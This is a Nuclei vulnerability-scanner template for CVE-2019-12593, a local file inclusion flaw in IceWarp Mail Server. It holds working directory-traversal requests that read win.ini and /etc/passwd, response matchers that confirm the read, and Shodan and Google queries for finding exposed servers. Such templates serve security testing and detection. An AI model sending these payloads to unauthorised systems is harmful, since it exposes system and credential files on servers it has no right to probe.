nuclei-templates/cves/2019/CVE-2019-12593.yaml

41 lines
1.2 KiB
YAML

id: CVE-2019-12593
info:
name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
author: pikpikcu
severity: high
description: |
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
reference:
- https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
- http://www.icewarp.com
- https://nvd.nist.gov/vuln/detail/CVE-2019-12593
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-12593
cwe-id: CWE-22
metadata:
google-query: Powered By IceWarp 10.4.4
shodan-query: title:"icewarp"
tags: cve,cve2019,lfi,icewarp
requests:
- method: GET
path:
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
matchers-condition: and
matchers:
- type: word
words:
- "[intl]"
- "root:x:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/17